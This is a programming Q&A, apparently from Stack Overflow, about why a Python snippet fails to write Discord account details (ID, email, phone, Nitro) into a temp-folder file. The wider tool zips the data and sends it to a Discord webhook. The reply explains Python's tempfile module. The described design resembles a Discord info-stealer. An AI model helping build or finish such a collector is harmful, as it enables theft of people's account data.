# Why wont this part of my code make a tempfile?

Tags: python, discord, webhooks, temporary-files

I just made a account here so sorry in advance

I am trying to make a tool that will give me some information about my discord account etc, put it into a file, zip it up and send it to a discord webhook.

The zip file gets sent to the webhook with no errors, and everything except the discord part is in the file. Here is my code:

```
val += f'Discord ID: {discord_id}\nEmail: {email}\nPhone: {phone}\nNitro: {nitro}\n'

            if True:
                dcvault = create_temp()
                with open(os.path.join(tempfolder, "Discord", "Discord Info.txt"), "a", encoding="utf-8") as f:
                    f.write(f'{val}')
                os.remove(dcvault)
```

Comment: How is `dcvault` related to `tempfolder`?

Comment: You create a tempfile of some sort and store it to `dcvault`, then do something that has nothing to do with `dcvault` (making no use of it at all), then delete `dcvault`... I'm also rather confused by what `create_temp` even is; it's not part of the `tempfile` module, which is almost certainly what you should be using...

Answer (score 0):

Take a look at Python's [`tempfile`](https://docs.python.org/3/library/tempfile.html) module. Here is a quick example that is similar to your example, but with a few layers of complexity removed for illustrative purposes. You can remove the `seek()` and `.read()` and put in whatever you would like to do with the temp file or the data written to it.

### Code

```py
import tempfile

val = 'Some data'

with tempfile.TemporaryFile() as fh:
    fh.write(val.encode())
    fh.seek(0)
    output = fh.read()
    print(output.decode())
```

### Output

```
Some data
```